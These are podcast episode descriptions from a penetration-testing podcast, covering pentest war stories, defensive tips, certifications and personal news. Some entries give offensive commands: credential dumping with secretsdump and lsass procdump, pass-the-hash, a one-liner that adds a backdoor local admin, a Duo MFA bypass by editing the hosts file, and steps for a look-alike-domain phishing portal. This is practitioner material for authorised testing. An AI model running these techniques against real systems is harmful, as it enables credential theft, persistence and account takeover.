7 Minute Security

Today my pal Gh0sthax and I pick apart the Verizon Data Breach Investigations Report and help you turn it into actionable items so you can better defend your network! I'm especially excited because today's episode marks two important 7MS firsts: The episode has been crafted by a professional podcast producer The episode has been transcribed by a professional transcription service

Today's episode is a fun tale of pentest pwnage! Interestingly, to me this pentest had a ton of time-sponging issues on the front end, but the TTDA (Time to Domain Admin) was maybe my fastest ever. I had to actually roll a fresh Kali VM to upload to the customer site, and I learned (the hard way) to make that VM disk as lean as possible. I got away with a 15 gig drive, and the OS+tools+updates took up about 12 gig. One of the biggest lessons I learned from this experience is to make sure that not only is your Kali box updated before you take it to a customer site (see this script), but you should make sure you install all the tool dependencies beforehand as well (specifically, Eyewitness, Impacket and MITM6). This pentest was also extremely time-boxed, so I tried to get as much bang out of it as possible. This included: Capturing hashes with Responder Checking for "Kerberoastable" accounts (GetUserSPNs.py -request -dc-ip x.x.x.x domain/user) Check for MS14-025 (see this article) Check for MS17-010 (nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms17-010 192.168.0.0/24 -oA vulnerable-2-eblue) and try this method of exploiting it Check for DNS zone transfer (dnsrecon -d name.of.fqdn -t axf) Test for egress filtering of ports 1-1024 Took a backup of AD "the Microsoft way" and then cracked with secretsdump: sudo python ./secretsdump.py -ntds /loot/Active\ Directory/ntds.dit -system /loot/registry/SYSTEM -hashes lmhash:nthash LOCAL -outputfile /loot/ad-pw-dump

Today we're talking about eating the security dog food! What do I mean by that? Well, a lot of security companies I worked for in the past preached to clients about the importance of having a good security program, but didn't have one of their own! I'm trying to break that pattern now that I'm in a position to lead an information security program for 7MS. In today's episode we talk about getting your company started with a good set of infosec policies/procedures. First up is a "mothership" infosec policy with the following sub-policies inside it: Acceptable Use Data Protection and Privacy Physical Security Tools and Technology Training and Awareness Reporting Oh, and the song I jazz/scat/sang coming out of the jingle was If I Were a Dog

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount! Today's episode is all about mental health! I talk about some of my challenges with stress/anxiety and how I finally put on my big boy pants, dropped some misconceptions and decided to do something about it. Additionally, this episode contains references to: Jon Secada Arsenio Hall Lone Wolf McQuade

Today's episode is all about getting the most value out of your vulnerability scans, including: Why, IMHO you should only do credentialed scans Policy tweaks that will keep servers from tipping over and printers from printing novels of gibberish ;-) How to make your scan report more actionable and less unruly Turning up logging to 11 (use with caution!) A small tweak to an external scan policy that can result in the difference between a successful or failed scan The nessusd.rules file is awesome for excluding specific hosts and services from your scans

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more. Today we're talking about some of my favorite features of Pi-hole 5.0. Including: WARNING! WARNING! Upgrading from 4.x is a one-way operation! Per-client blocking (you can setup, for example, a group machines called "kids" and apply specific domain block/allow lists and domains to them) More granular detail (especially if there are issues) when blocklists get updated Better, richer debug log output I also talk about a great companion for yor Pi-hole: a command-line Internet speed test! Hat tip to Javali over at the 7MS forums who told me about this. Additionally, I briefly mention "Hashy" (the nickname of my password cracking rig), give you some stay-at-home streaming TV show recommendations, and give you a quick house rebuild update!

Today's episode kicks off a fun little experiment where my pal Joe Skeen and I cover some of the week's interesting security news stories, how they might affect you, and what you can do to make you and your company more secure. This week's stories: Salt stack RCE (Daily Swig / Cyber Scoop) Malware uses Corporate MDM as attack vector (Checkpoint) Critical vulns in Sharefile (Citrix) Shareholders sue Labcorp over their 'persistent' failure to secure data (Cyberscoop)

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount! Today I'm excited to share more tales of pentest FAIL with you. Today's tales include: Accidentally scanning assets that belong to an agency that nobody should be messing with Delivering reports with vulnerabilities from somebody else's network Why it's important to write a report more than 15 minutes before delivery Lessons learned from firing a disgruntled employee

Hey everybody! I hope you're hanging in there during quarantine and staying healthy. Today is part 3 of our ongoing series all about becoming a PCIP. The good news is I'm finally, actually registered for the cert and have started diving into the training! So in today's episode I want to regurgitate some of what I'm learning to whet your appetite (or not) for this particular certification. Specifically, we cover: The overview and objectives for being a PCIP (TLDR: PCIP does NOT replace QSA or ISA, but gives us a good understanding of how to protect payment card data) How and why payment card data is leaked/stolen/breached - and then sold/monetized The definition of some fundamental PCI acronym soup, including PCI DSS, PA-DSS and P2PE

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more. In today's episode we share some tips for working more safely and securely from home, which for many of us is our new office for the foreseeable future! Specifically, we cover: Picking powerful passwords Locking down your wifi Defending your digital identity Protecting your PC Blocking icky stuff in your browser Composing careful conference calls Clicking links carefully I've also made this episode available in long-form blog here. Please feel free to share with anybody you think could benefit from the info!

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount! Today is sort of a continuation of episode 407 where we covered four fun stay-at-home security projects including FoldingAtHome building a headless pi-hole, redoing your network with a Dream Machine, and enjoing some music via Zoom by way of Q.U.A.C.K. In this episode, we cover: Pentester Academy is awesome and currently has a steal of a deal if you're looking to score a membership on the cheap! CompTIA caught my eye because they're offering 20% off certain tests/bundles with coupon code earthday2020. Personally I'm this close to pulling the trigger on this CompTIA Cloud+ bundle, and even better, they offer online testing during this stay-at-home time! Pi-Holes are a free and awesome way to keep ads and other garbage off your network. Additionally, I give you 100 extra nerd points if you enable DNSSSEC. Just make sure your date/time settings on the box is correct, otherwise DNS will be pretty broken. I discuss a fix here on the 7MS forums.... Read more at 7ms.us!

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more. I'm gonna love you like coronavirus, I don't know what else to say I'm gonna love you like coronavirus, I'm gonna stand 6 feet away Yes our love was meant to be, but it will have to wait until later Cuz I don't wanna end up hooked up to a ventilator In today's episode I continue sharing my journey about becoming a PCIP. Spoiler alert: I'm still applying to even start training to be one. Here's what we'll cover: The pentesting requirement 11.3 from PCI that kind of boggles my brain, and some advice I got from a PCI guru that helped clear things up for me. This video also helped me better understand requirement 11.3. The super sucky couple of personal quarantine days I've had that include: Cocoa that tastes like mint-flavored old lady diarrhea Our fridge and freezer going ka-put Exploding drinks in my fridge A multi-thousand dollar repair on our new house that hasn't even technically broken ground yet (!)

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount! Today I'm starting a journey to become a PCI Professional (PCIP), and I'll be periodically updating the status of this journey on the 7MS forums. You don't need to be a QSA to get a PCIP, but you do need "2 years in IT or payments related background to have your application approved." The PCIP certification gives you (and I'm quoting from the PCI Web site): Principles of PCI DSS, PA-DSS, PCI PTS, and PCI P2PE Standards Understanding of PCI DSS requirements and intent Overview of basic payment industry terminology Understanding the transaction flow Implementing a risk-based prioritized approach Appropriate uses of compensating controls Working with third-parties and service providers How and when to use Self-Assessment Questionnaires (SAQs) Recognizing how new technologies affect the PCI (e.g. virtualization, tokenization, mobile, cloud) The test costs + exam for a non-participating organization (like 7MS) is $2,500. You also have to re-up every 3 years for $260 (yay, another thing to have to pay for regularly). In the miscellany department: Do you know someone who would enjoy a live 3-song acoustic concert? Check out my family's new ministry, Q.U.A.C.K. - Quarantined Unplugged Acoustic Concerts of Kindness. A Webinar on creating kick-butt cred-capturing phishing portals is happening on Tuesday, April 14! Register here!

This episode of the 7MS podcast is brought to you by ITProTV. It's never too late to start a new career in IT or move up the later, and ITProTV has you covered. From CompTIA and Cisco to ECCouncil and VMWare. Get a 7-day free trial and save 30% off all plans by going to itpro.tv/7MS "I think of what the world could be If it did not have COVID-19 A million dreams is all it's gonna taaaaaaaaaaaaaaaake!" Today's episode is a continuation and update on the cell phone security for tweenagers episode from about a year ago. Specifically, I talk about: How the cell phone contract I put together for my tweenager kind of blew up in my face I'm the worst dad in the world because my wife and I enforced a "no screens" policy for a few weeks. We lived. Barely. Apple Screen Time is your friend, and helps put some limits on iDevice use The Dream Machine makes it easy to setup a segmented wireless network just for your kids. You can also "time box" their individual network to only broadcast at certain hours of the day You can then apply OpenDNS to filter bad sites on just the kiddo network or ALL your networks If you make a home backup/DR plan make sure it includes important stuff like: passwords to important things, as well as critical contacts like your tax prep person, financial advisor and subcontractors. More info at 7ms.us!

In today's episode I share four fun stay-at-home security projects - three with a security focus and one centered around music. Let's gooooooooo! FoldingAtHome The Folding At Home project helps use your GPU/CPU cycles for COVID-19 research. From the Web site: We need your help! Folding@home is joining researchers around the world working to better understand the 2019 Coronavirus (2019-nCoV) to accelerate the open science effort to develop new life-saving therapies. By downloading Folding@Home, you can donate your unused computational resources to the Folding@home Consortium, where researchers working to advance our understanding of the structures of potential drug targets for 2019-nCoV that could aid in the design of new therapies. The data you help us generate will be quickly and openly disseminated as part of an open science collaboration of multiple laboratories around the world, giving researchers new tools that may unlock new opportunities for developing lifesaving drugs. It's awesome! Since I run my cracking rig as a headless Linux install, I followed the advanced install and then used the command line options to run FAHClient standalone (only because personally I don't really love running extra, always-on services on any of my boxes). It looks like FAH is having a good problem in that there are more resource donors than research to number-crunch on! Keep tabs on the forums for up-to-date information. See more information at 7ms.us!

This episode of the 7MS podcast is brought to you by ITProTV. It's never too late to start a new career in IT or move up the later, and ITProTV has you covered. From CompTIA and Cisco to ECCouncil and VMWare. Get a 7-day free trial and save 30% off all plans by going to itpro.tv/7MS First and foremost, I hope you all are doing well and taking care of yourselves. Today's episode focuses on disasters, which is unfortunately a very appropriate topic. As a quick refresher, our family had a fire a few months ago. It sucked. I talked about the day of the fire in this episode then did a "how do we get back on the grid?" episode here and then answered some of your FAQs here. Regardless of if your DR plan includes fires, virus outbreaks, tornados or zombie attacks, it's important to have a solid plan for your family and business. So in today's episode I cover these main two topics: A DIY $500 NAS + Unlimited Cloud Backup Plan In trying to be more organized with my backup strategy, I set out to create a new backup plan with the following criteria: Priced at ~$500 One on-prem array Encrypted at rest Backs up to cloud with encryption key I control Unlimited scalable storage I found my solution using this awesome video but I need to warn you about something right off the bat: the config in this video and in today's episode is not supported by CrashPlan because CP doesn't have a native backup agent that will run on the Synology NAS (at the time of this writing, anyway). With that said, here's the grocey list of things that make up my backup rig: (See more info on the show notes for todya's episode at 7ms.us)

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more. Today's episode of pentest pwnage is the (hopefully) exciting conclusion to this episode. Last we left this pentest, we ran into some excellent blue team defenses, including: MFA on internal servers (which we bypassed) Strong passwords Limited vulnerable protocols (LLMNR/Netbios/etc) available to abuse for cred-capturing Servers that were heavily firewalled off from talking SMB to just any ol' subnet nor the Interwebs (here's a great video on how to fine-tune your software firewall chops) In today's episode we talk about: How maybe it's not a good idea to make computer go completely "shields down" during pentests Being careful not to fat-finger anything when you spawn cmd.exe with creds, like runas /netonly /user:samplecompany\billybob "C:\windows\system32\cmd.exe" Being careful not to fat-finger anything when using CrackMapExec How fundamental and really effective blue team controls (such as the ones mentioned above) can really make pentesting a headache! How you should be careful when spawning shells with MultiRelay (part of Responder is it creates new services on your victim machine Has the 7MS podcast helped you in your IT and security career? Please consider supporting us!

Today's slightly off-topic episode kicks off a new tag called 7MOOMAMA. That stands for 7 Minutes of Only Music and Miscellaneous Awesomeness. To kick things off, I'm super excited to share with you two new security-themed songs for some of my favorite security things! They are: Backdoors and Breaches - my favorite incident response card game. OWASP Juice Shop - my favorite vulnerable Web application. Enjoy! Backdoors and Breaches Backdoors and Breaches I love the way teaches me to think about security controls And their proper placement Backdoors and Breaches I can't wait to blow my paycheck just to get myself a game deck and then move Out of my mother's basement Soon I'll be sittin' down and playing it with my red and blue teams Or John and gang at Black Hills Info Security And when I go to bed tonight I know what's gonna fill my dreams Backdoors and Breaches Juice Shop VERSE 1 When you want to shop online then you had better be sure The experience is safe and also secure Don't want to let no SQLi or cross-site scripting ruin your day No, you want to break into a joyous song and say: CHORUS 1 Juice Shop! Juice Shop! You can order tasty beverages in any quantity Juice Shop! Juice Shop! Just don't test the site with Burp Suite or you won't like what you see VERSE 2 Now if you're feeling kinda sneaky and you're inclined to explore You might find inside the Juice Shop...a hidden score board It will point you towards a vuln'rability or maybe two And when you're done you'll say, "This site should get a code review!" CHORUS 2 Juice Shop! Juice Shop! It has got more holes then a warehouse filled with gallons of Swiss cheese Juice Shop! Juice Shop! ...finish the songs at 7ms.us

Today I'm joined by Matt Duench (LinkedIn / Twitter), who has a broad background in technology and security - from traveling to over 40 countries around the world working with telecom services, to his current role at Arctic Wolf where he leads product marketing for their managed risk solution. Matt chatted with me over Skype about a wide variety of security topics, including: Corporate conversations around security have changed drastically in such a short time - specifically, security is generally no longer perceived as a cost center. So why are so many organizations basically still in security diapers as far as their maturity? Why is it still so hard to find "bad stuff" on the network? What are some common security mistakes you wish you could wave a magic wand and fix for all companies? The beauty of the CIS Top 20 and how following even the top 5 controls can stop 85% of attacks. Low-hanging hacker fruit that all organizations should consider addressing, such as: Disabling IPv6 Using a password manager Turning on multi-factor authentication Don't write down your passwords! Have a mail transport rule that marks external mail as "EXTERNAL" so it jumps out to people Consider an additional rule to stop display name spoofing (h/t to Rob on Slack!) Why you should be concerned about corporate account takeover, and how to better protect yourself and your company against this attack vector I also asked Matt a slew of questions that many of you submitted via Slack: More info under the show notes for this episode at 7ms.us!

It's episode 401 and we're having fun, right? Some things we cover today: The Webinar version of the DIY Pwnagotchi evening will be offered in Webinar format on Tuesday, March 10 at 10 a.m. A quick house fire update - we're closer to demolition now! I finally got a new guitar! Besides that, I've got a wonderful tale of pentest pwnage for you. Warning: this is a TBC (to be continued) episode in that I don't even know how it will shake out. I'm honestly not sure if we'll get DA! Here are the highlights: I think in the past I might've said unauthenticated Nessus scans weren't worth much, but this test changed my mind. If you can't dump local hashes with CrackMapExec, try SecretsDump! ./secretsdump.py -target-ip {IP of target machine} localhost/{username}@{target IP} If you're relaying net user commands (or just typing them from a relayed shell), this one-liner is a good way to quickly add your user to local admins and the Remote Desktop Users group: net user /add ladmin1 s00p3rn4ughtyguy! /Y & net localgroup Administrators ladmin1 /add & net localgroup "Remote Desktop Users" ladmin1 /add Trying to RDP into a box protected with Duo MFA? If you can edit the c:\windows\system32\drivers\etc\hosts file, you might be able change the Duo authentication server from api-xxxxxxx.duosecurity.com to 127.0.0.1 and force authenetication to fail open! Source: Pentest Partners In general, keep an eye on CrackMapExec's output whenever you use the '-x' flag to run commands. If the system is "hanging" on a command for a while and then gives you NO output and just drops you back at your Kali prompt, the command might not be running at all due to something else on the system blocking your efforts. More on today's show notes at 7ms.us!

Wow, happy 400th episode everybody! Also, happy SIXTH birthday to the 7MS podcast! Today I've got a really fun tale of internal network pentest pwnage to share with you, as well as a story about a "poop-petrator." Key moments and takeaways include: Your target network might have heavy egress filtering in place. I recommend doing full apt-get update and apt-get upgrade and grabbing all the tools you need (may I suggest my script for this?). If the CrackMapExec --sam flag doesn't work for you, give secretsdump a try, as I ran it on an individual Win workstation and it worked like a champ! If the latest mimikatz release doesn't rip out passwords for you, try the release from last August. For whatever reason (thanks 0xdf) for the tip! If your procdumps of lsass appear to be small, endpoint protection might be getting in the way! You might be able to figure out what's running - and stop the service(s) - with CrackMapExec and the -x 'tasklist /v' flag. If you need to bypass endpoint protection, don't be afraid to go deep into the Google search results. Unfortunately, I think that's all I can say about that, as vendors seem to get snippy about talking about bypasses publicly. Has 7MS helped you in your IT and security career? Please consider buying me a coffee!

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more. Believe it or not I'm pentesting your stuff I never thought I could feel so free-hee-hee I compromised one of your Domain Admins Who it could be? The guy with "Password123" In today's episode we're talking all about building your own password-cracking rig! "Wait a minute!" you say. "Are you abandoning the Paperspace password cracking in the cloud thing?" Nope! I'm just bringing that methodology "in house" for a little better opsec and also because last year on Paperspace I spent thousands of dollars. First things first - here's the hardware I ended up with: Inland Premium 512GB SSD 3D NAND M.2 2280 PCIe NVMe 3.0 x4 Internal Solid State Drive [Intel Core i5-9400F Desktop Processor 6 Core up to 4.1GHz Without Processor Graphics LGA1151 (Intel 300 Series chipset)](https://www.microcenter.com/product/602028/intel-core-i5-9400f-desktop-processor-6-core-up-to-41ghz-without-processor-graphics-lga1151-(intel-300-series-chipset) ASUS ROG Strix Z390-H Gaming LGA 1151 ATX Intel Motherboard EVGA SuperNOVA 1200P2 1200 Watt 80 Plus Platinum Modular Power Supply For a full shopping list and more notes, head to 7ms.us!

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more. I'll be your Raspberry Pi zero baby I don't know what else to say I'll keep bad stuff off of your network I will do it both night and day Today I talk about four cool Raspberry Pi projects that will help you better secure your network. First off though, I give a shout out to my son Atticus who I want to be more like because he doesn't give a rat's behind what other people think of him! The cool Pi-based projects I love are: Pi-Hole is a black hole for Internet advertisements and it literally installs with just a few commands: git clone --depth 1 https://github.com/pi-hole/pi-hole.git Pi-hole cd "Pi-hole/automated install/" sudo bash basic-install.sh Pwnagotchi is a cute little devil who exists only to capture WPA handshakes! I did a whole episode on it, and invite you to build a DYI Pwnagotchi with me live on Feb 10. How to use a Raspberry Pi as a Network Sensor is a really cool Webinar I watched (brought to us by our pals at BHIS and ActiveCountermeasures) that shows you how to use a Pi with an external drive to install Bro and other tools to help you find bad stuff on your network. CanaryPi is freaking sweet and can detect NBNS/LLMNR/mDNS spoofing as well as port-scanning, yeah baby! And coming soon (hopefully): mitm6 detection! Has 7MS helped you in your IT and security career? Please consider buying me a coffee!

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more. I'm working on a new security song called Don't Let the Internet Get You Down, and the chorus will go something like this: Don't let the Internet get you down It's full of trolls and 10 year olds and adolescent clowns So let their words roll off of you, like water off a duck To prove to them that you don't give a darn On a more serious note, here are some opsec tips that hopefully will help you as a security consultant: Good contracts - make sure your SOWs have lots of CYA verbiage to protect you in case something breaks, your assessment schedule needs to be adjusted, etc. Also, consider verbiage that says you'll only retain client testing artifacts (hashes, vuln scans, etc.) for a finite amount of time. Scope - make sure you talk about scope, both in written and verbal form, often! Also, a Nessus scanning tip: use the nessusd.rules file to not scan any IPs the client doesn't want touched. That way Nessus won't scan those IPs even if you try to force it to! Send information to/from clients safely - consider forcing MFA on your file-sharing portals, as well as a retention policy so that files "self destruct" after X days. ....and more on today's episode (see 7ms.us for more show notes)! Has 7MS helped you in your IT and security career? Please consider buying me a coffee!

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more. In last week's episode I was very close to potentially synching up some very sensitive data with my super secret back door account. In this episode, we resolve the cliffhanger and talk about: How I don't remember lyrics or titles to songs - even the ones I love - such as My Prerogative. That's why Jack Black is my spirit animal, and he's awesome for singing Elton John songs right to Elton John If you get DA (relatively) quickly, consider pivoting to a network assessment and crack hashes with secretsdump, test egress filtering, run Network Detective and more Once you've cracked all the hashes you can, run it through hashcombiner and Pipal like this: python /opt/hashcombiner/hash_combiner.py user_hash hash_password | sort > combined.txt cut -d ':' -f 2 combined.txt > passwords.txt ruby /opt/pipal/pipal.rb passwords.txt > pip.txt The procdump + lsass trick is still really effective (though sometimes AV gobbles it) (See full show notes at 7ms.us!)

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more. In today's tale of pentest pwnage I got to try some tools and tricks for the first time! Here are the key points/takeaways from this test: It's great to have additional goals to achieve in a network pentest outside of just "get DA" PayloadsAllTheThings has a great section on Active Directory attacks Using mitm6 and ntlmrelayx is now my new favorite thing thanks to The Cyber Mentor's fantastic video showing us exactly how to launch this attack! If you're scared of running mitm6 and accidentally knocking folks off your network, setup your Kali box to reboot in a few minutes just to be safe. Do something like: shutdown -r +15 "Rebooting in 15 minutes just in case I mitm6 myself right off this box!" When mitm6+ntlmrelay dumps out a series of html/json files with lists of users, groups, etc., read through them! Sometimes they can include treats...like user passwords in the comment fields! Use crackmapexec smb IP.OF.DOMAIN.CONTROLLER -u username -p password to verify if your domain creds are good! There are a bunch of people I need to thank because their tools/encouragement/advice played a part in making the test successful. See today's show notes on 7ms.us for more info!

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more. Sung to the tune of "Do You Wanna Build a Snowman" Do you wanna build a Pwnagotchi? Even though you thought you never would? I really hope mine doesn't ever break It grabs wifi handshakes It does it really good! Today's episode is all about Pwnagotchi, a cute little device whose sole purpose in life is to gobble WPA handshakes! Check out today's episode to learn more about the device (as well as some pwn-a-gotchas that you should be aware of), and then come to the next 7MS user group meeting to build your own! If you can't make this meeting I'll also do a Webinar version of the presentation - likely in February or March, so stay tuned to our Webinars page. At the end of today's episode I talk about my troll foot. I fractured my ankle on Christmas Eve and was basically this lady. At the end of the day I received an avulsion fracture and it kinda made my Christmas stink. But 2020 is gonna absolutely rip, friends!

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount! Peter Kim of The Hacker Playbook series joins me today to talk about all things hacking! Peter runs a popular west coast hacker meetup, and I was fortunate enough to attend his Real World Red Team training, which I wrote a review about here. Peter sat down with me over Skype to talk about: The origin story of The Hacker Playbook series (btw please buy it, don't steal it! :-) How do you balance work and family life when trying to pwn all the things and have a personal life and significant other? How do you break into security when your background is in something totally different, like a mechanic, artist or musician? What are some good strategies when approaching a red team engagement - do you always start "fresh" from the perimeter? Do you assume compromise and throw a dropbox on the network? Some combination of both? What are some other low-hanging fruit organizations can use to better defend their networks? Do you run across some of these good defenses - like honeypots - in your engagements? If you could put on a wizard hat and solve one security problem (be it technical, personnel or something else) what would it be? ...and more!

Today's episode is brought to you by ITProTV. It's never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute. Today's episode is all about LAPS - Microsoft's Local Administrator Password solution. In a nutshell, LAPS strengthens and randomizes the local administrator password on the systems across your enterprise. We talked about it way back in episode 252 but figured it was worth a revisit because: It's awesome It's free People still haven't heard of it when I share info about it during conference talks! I've got a full write-up of how to install LAPS here At a recent conference people asked me two awesome edge case questions: What if I aggressively delete inactive machines from my AD - does the LAPS attribute go with it? What do I do if I use Deep Freeze and the LAPS password attribute in AD keeps getting out of sync with the actual password on systems because of Deep Freeze's freeze/thaw times?

Today's episode is brought to you by ITProTV. It's never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute. This is part three of this series - part 1 talked about a fire that destroyed my family's home and vehicles, and part 2 was about how to get "back on the grid" and start working with the insurance machine to find a new "normal." Today, I want to answer some burning questions many of you have been asking: Have you hit rock bottom yet? (Spolier alert: no, but I tell you about a moment I almost lost my mind after dropping a shoe in a storm drain) How long to you get to keep rental cars before you have to replace your permanent vehicles? Do you have to stay in a hotel the whole time your house is rebuilt? What about if you get placed in temporary housing - do you have to rebuy your beds/furniture/clothes/etc. and keep them at your temp place, then move them again once your house is rebuilt? What adjustments might you want to make to your insurance policies to make sure you have the right amount of coverage in case of emergency?

Today's episode is brought to you by ITProTV. It's never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute. Today's episode is a twofer. That's right, two tales of internal network pentest pwnage. Whoop whoop! We cover: What the SDAD (Single Domain Admin Dance) and DDAD (Double Domain Admin Dance) are (spoiler: imagine your dad trying to dance cool...it's like that, but more awkward) A good way to quickly find domain controllers in your environment: nslookup -type=SRV _ldap._tcp.dc._msdcs.YOURDOMAIN.SUFFIX This handy script runs nmap against subnets, then Eyewitness, then emails the results to you Early in the engagement I'd highly recommend checking for Kerberoastable accounts I really like Multirelay to help me pass hashes, like: MultiRelay.py -t 1.2.3.4 -u bob.admin Administrator yourmoms.admin Once you get a shell, run dump to dump hashes! Then, use CME to pass that hash around the network! crackmapexec smb 192.168.0.0/24 -u Administrator -H YOUR-HASH-GOES-HERE --local auth Then, check out this article to use NPS and get a full-featured shell on your targets

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount! In part 1 of this series we talked about a tragic event my family experienced a few weeks ago: we lost our house and vehicles in a fire. Today I'll talk about: How to get "back on the grid" when starting with nothing but the clothes on your back. Checklist includes: New licenses New ATM/credit cards Rental vehicles Temporary housing How the most wonderful people in the world come out of your past to lift you up and help you out - and how it may not the people you expect What's it like working with the insurance machine? What do they help with and not help with? How much does it suck to lose all your stuff? (Spoiler alert: a lot) The relief (as weird as that sounds) that comes with losing all your material things Thanks again for your support via GoFundMe

In today's episode I talk about how my family's house and two vehicles were recently destroyed in a fire. The Johnson family is all ok - no injuries, thank God. However, this has turned our world upside down, and over the past week of sleepless nights I've thought a lot about how this tragedy could help others ensure their families are safe and secure both during and after a disaster. I imagine this series will go something like this: Today: Talk about "day zero" - everything that happened on the day of the fire Part 2: Talk about what it's like working with insurance, 3rd party vendors, getting rental cars, finding temporary housing, and basically getting "back on the grid" starting with NO identification or credit cards Part 3: Talk about the people part of all this. What are the effects on the family? On the community? On our health? On our faith? Some folks in the security community were kind enough to setup a GoFundMe if you'd like to support my family during this time.

Today's episode features a few important changes to the tools and services I use to run 7MS: Docusign is out and (sort of) replaced with Proposify Voltage SecureMail is out and replaced by ShareFile Ninite is rad for keeping mobile pentest dropboxes automatically updated! Nessys_SortyMcSortleton has been updated to...you know...work Additionally, we talk about a few biz-specific challenges: How do you (comfortably) talk about money with a client before the SOW hits their inbox? If you're a small security consultancy of 2-5 people, do you lie about your company size to impress the big client, or tell the truth and brag about the advantages a nimble team can bring?

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount! I'm sorry it took me forever and a day to get this episode up, but I'm thrilled to share part 4 (the final chapter - for now anyways) of my interview with the red team guys, Ryan and Dave! In today's episode we talk about: Running into angry system admins (that are either too fired up or not fired up enough) Being wrong without being ashamed When is it necessary to make too much noice to get caught during an engagement? What are the top 5 tools you run on every engagement? How do you deal with monthly test reports indefinitely being a copy/paste of the previous month's report? How do you deal with clients who scope things in such as way that the test is almost impossible to conduct? How do you deal with colleagues who take findings as their own when they talk with management? How do you work with clients who don't know why they want a test - except to check some sort of compliance checkmark? What is a typical average time to complete a pentest on a vendor (as part of a third-party vendor assessment)? How could a fresh grad get into a red team job? What do recruiters look for candidates seeking red team positions? If a red team is able to dump a whole database of hashes or bundle of local machine hashes, should they crack them? What do you do when you're contracted for a pentest, but on day one your realize the org is not at all ready for one? What's your favorite red team horror story?

Today's episode is brought to you by ITProTV. It's never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute. Today I'm joined by a very special guest: Mrs. 7MS! She joins me on a road trip to northern MN, reads me some questions from the 7MS mail bag, and we tackle them together (with a side order of commentary on weddings, overheating iPads, cheap hotels and the realization that this is likely the first - and only episode that Mrs. 7MS has ever listened to). Links to things discussed this episode: Wireless pentest certs: SEC617 - SANS course that covers wifi pentesting (with WPA enterprise attacks) Offensive Security Wireless Professional Good/free pentest training options: Pentester Academy VulnHub Rastalabs The Cyber Mentor Free logging/alerting solutions for SMBs: WEFFLES Logging Made Easy HELK Wazuh

In this episode I talk about some things I learned about making your own kick-butt cred-capturing phishing campaign and how to do so on the (relatively) quick and (relatively) cheap! These tips include: Consider this list of top 9 phishing simulators. Check out GoPhish! Then spin up a free tier Kali AWS box Follow the instructions to install GoPhish and get it running on your AWS box Use the Expired Domains site to buy up a domain that is similar to your victim - maybe just one character off - but has been around a while and has a good reputation Add a G Suite or O365 email account (or whatever email service you prefer) to the new domain Create a convincing cred-capturing portal on GoPhish - I used some absolutely disguisting and embarassing HTML like this (see show notes on 7ms.us): Use this awesome article to secure your fancy landing page with a LetsEncrypt cert! Have fun!!!

